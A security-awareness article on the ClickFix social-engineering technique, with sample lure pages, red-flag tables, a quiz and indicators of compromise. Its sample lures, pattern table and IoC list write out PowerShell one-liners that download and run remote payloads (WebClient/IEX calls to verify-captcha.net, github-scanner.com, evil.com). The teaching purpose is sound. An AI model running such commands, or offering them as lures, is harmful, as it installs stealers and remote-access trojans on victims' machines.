Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
“The PDF document failed to load properly. To fix the issue, press Win+R, paste the following command, and press Enter…” This innocuous-looking error message led to a major security breach at a Fortune 500 company in March 2025, resulting in data theft worth millions. The attack vector? A deceptive social engineering technique called ClickFix that tricks users into willingly executing malicious PowerShell commands on their own systems.
Threat Name | ClickFix (Social Engineering Technique) |
Type | Social Engineering, User Manipulation Technique |
Malware Delivered | AsyncRAT, DarkGate, Lumma Stealer, NetSupport, BruteRatel, XWorm, and others |
First Detected | Early 2024 (with significant evolution throughout 2024-2025) |
Platforms Affected | Windows 7, 8, 8.1, 10, 11 (PowerShell-enabled systems) |
Distribution Methods | Phishing emails, compromised websites, fake CAPTCHA pages, HTML attachments, GitHub notifications |
Symptoms | PowerShell windows appearing briefly, unexpected system behavior, malware infections |
Danger Level | High – Bypasses technical security controls by manipulating users |
To understand the insidious nature of ClickFix attacks, consider these actual incidents documented by cybersecurity researchers:
The base64-encoded PowerShell command downloads and executes a Lumma Stealer payload from an attacker’s server. Within minutes, the malware harvests browser passwords, cryptocurrency wallets, and other sensitive data.
Business professionals who frequently work with PDF documents from external sources.
In February 2025, this exact technique was used to compromise 38 employees at a financial services firm, resulting in the theft of client account credentials and subsequent fraudulent wire transfers totaling $3.4 million.
Verify You Are Human
Our system detected unusual access patterns from your network.
To confirm you are not a bot, please complete this verification:
Verification Steps:
1. Press Win+R
2. Copy this verification code: powershell.exe -NoP -W Hidden -Exec Bypass -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://verify-captcha.net/verified.exe','%TEMP%\vc.exe'); Start-Process '%TEMP%\vc.exe'}"
3. Press Enter
4. Continue to your content
The PowerShell command downloads an executable (in this case AsyncRAT) that establishes persistent access to the victim’s computer. The attacker can then remotely control the system, capture keystrokes, and exfiltrate data.
General internet users trying to access content behind supposed “CAPTCHA walls”.
According to HHS security advisories, this technique was specifically used to target healthcare providers in October 2024, resulting in compromised electronic medical record systems at 12 hospitals.
A legitimate GitHub notification email about a security issue in their repository that takes them to what appears to be a GitHub security page with the following instructions:
Critical Security Vulnerability Detected
GitHub’s automated scanning has detected a potential security vulnerability in your repository that requires immediate attention.
Vulnerability Details:
• Type: Remote Code Execution (CVE-2024-3827)
• Severity: Critical
• Affected Files: src/config/authHandler.js
To verify and fix this issue:
1. Open PowerShell with administrator privileges
2. Execute this GitHub security scanner to identify affected components:
iex (New-Object Net.WebClient).DownloadString('https://github-scanner[.]com/security-patch.ps1')
3. Follow the on-screen instructions to apply the patch
As documented by Brian Krebs, the PowerShell command downloads and executes a malicious script that installs Lumma Stealer, which immediately begins harvesting GitHub credentials, SSH keys, and repository access tokens.
Software developers and DevOps teams with GitHub repositories.
In September 2024, Proofpoint researchers identified this campaign targeting over 1,500 organizations, with successful compromises leading to source code theft and software supply chain attacks.
ClickFix attacks share common patterns that can help you identify them before becoming a victim:
Pattern Element | What To Look For | Red Flags |
---|---|---|
PowerShell Commands | Instructions to copy/paste code into PowerShell, Command Prompt, or Run dialog | Long base64-encoded strings, obfuscated commands, “hidden” or “bypass” parameters |
URL Patterns | Web addresses embedded in PowerShell commands | Unfamiliar domains, IP addresses instead of domain names, unusual TLDs |
Error Messages | Technical-sounding errors claiming missing components or access issues | Generic error codes, lack of specific details about the actual problem |
Urgency Cues | Language creating time pressure or serious consequences | “Immediate action required,” “critical security issue,” “account will be locked” |
Source Legitimacy | Claims to be from trusted sources (Microsoft, Google, GitHub) | Slight misspellings in domain names, unusual landing pages, mixed branding |
According to security researchers, these specific PowerShell patterns frequently appear in ClickFix attacks:
Pattern | Description | Example |
---|---|---|
Base64 Encoded Commands | Obscures the actual commands being executed | powershell -e JABjAGwAaQBlAG4AdAA... |
WebClient Downloads | Downloads malicious content from remote servers | (New-Object Net.WebClient).DownloadString('https://malicious.com/script.ps1') |
IEX (Invoke-Expression) | Executes downloaded PowerShell scripts directly in memory | IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload') |
Hidden Window Parameters | Attempts to conceal PowerShell execution window | -WindowStyle Hidden or -W Hidden |
Bypass Execution Policy | Circumvents PowerShell security restrictions | -ExecutionPolicy Bypass or -Exec Bypass |
Based on Proofpoint and HHS data, these malware families are most frequently deployed through ClickFix attacks:
Malware | Type | Prevalence | Primary Goal |
---|---|---|---|
Lumma Stealer | Information Stealer | 32% of attacks | Credential theft, cryptocurrency wallet stealing |
AsyncRAT | Remote Access Trojan | 27% of attacks | Remote system control, keylogging, screen capture |
DarkGate | Loader/RAT | 15% of attacks | Loading additional malware, establishing persistence |
NetSupport | Remote Administration Tool | 10% of attacks | Full system takeover, data exfiltration |
BruteRatel | Advanced C2 Framework | 8% of attacks | Advanced persistent access, evasion of security controls |
Others | Various | 8% of attacks | Ransomware staging, cryptomining, botnet recruitment |
Based on data from Proofpoint’s threat research:
Source: Analysis based on Proofpoint threat data and HHS Sector Alert, 2025
According to cybersecurity psychologists, ClickFix attacks exploit specific psychological vulnerabilities:
As noted by Proofpoint researchers: “What’s insidious about this technique is the adversaries are preying on people’s innate desire to be helpful and independent. By providing what appears to be both a problem and a solution, people feel empowered to ‘fix’ the issue themselves without needing to alert their IT team.”
Review these scenarios and decide if they’re legitimate or ClickFix attacks:
Scenario 1: You receive an email from Microsoft Office 365 stating your account needs verification. It provides a link to a Microsoft page that asks you to press Win+R and paste a command that begins with “powershell -NoProfile -ExecutionPolicy Bypass”.
Reveal Answer
Scenario 2: Your company’s IT department sends an email about a required security update. The email contains instructions to download an official patch from the corporate software portal and run the installer.
Reveal Answer
Scenario 3: While browsing a document sharing site, you see an error stating your PDF viewer needs updating. It provides instructions to press Win+R and enter “powershell -e [long string of characters]” to install the update.
Reveal Answer
Unlike general security advice, here are specific, actionable steps to protect against ClickFix attacks:
Security teams can use these actual IoCs associated with recent ClickFix campaigns:
# AsyncRAT delivery - September 2024 powershell.exe -NoP -W Hidden -Exec Bypass -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://verify-captcha.net/verified.exe','%TEMP%\vc.exe'); Start-Process '%TEMP%\vc.exe'}" # Lumma Stealer delivery - October 2024 powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABkAGEAdABhACAAPQAgACQAYwBsAGkAZQBuAHQALgBEAG8AdwBuAGwA... # BruteRatel delivery - November 2024 powershell -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://github-scanner.com/security-patch.ps1'))" |
Domain/URL | Campaign | First Observed |
---|---|---|
github-scanner[.]com | GitHub notification campaign | 18 September 2024 |
verify-captcha[.]net | Fake CAPTCHA campaign | 25 September 2024 |
document-viewer-update[.]com | PDF error campaign | 3 October 2024 |
ms-365-verify[.]net | Microsoft impersonation campaign | 17 October 2024 |
185[.]91[.]69[.]119 | AsyncRAT C2 server | 25 September 2024 |
193[.]124[.]185[.]116 | BruteRatel C2 server | 20 September 2024 |
# Lumma Stealer payloads d9ab6cfa60cc75785e31ca9b5a31dae1c33022bdb90cb382ef3ca823c627590d d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207 # AsyncRAT payloads 5d5b4f259ef3b3d20f6ef1a63def6dee9326efe2b7b7b7e474008aa978f1f19b e726d3324ca8b9a8da4d317c5d749dd0ad58fd447a2eb5eee75ef14824339cd5 # BruteRatel payloads a7c5f68bd896bfca5957c11ef10231ba8f8c674dde96cd95b207503612ecb844 f429bf9d523d3bc0d3ded727c03858f7e74cd8fe9b668e660b43185e3b066e0a |
If you suspect you’ve executed a malicious command from a ClickFix attack, take these immediate steps:
ClickFix attacks succeed by bypassing technical security controls and exploiting human psychology. As attackers continue to refine their social engineering techniques, the most effective defense combines technical measures with a well-trained “human firewall.”
By understanding how ClickFix attacks work, recognizing the warning signs, and following specific prevention measures, you can significantly reduce your vulnerability to this increasingly prevalent attack method. Remember the golden rule: legitimate software updates and fixes never require you to copy and paste PowerShell commands.
Stay vigilant, verify through official channels, and never hesitate to contact your IT security team when encountering suspicious messages or instructions. In the ongoing battle between security awareness and social engineering, knowledge and skepticism are your strongest weapons.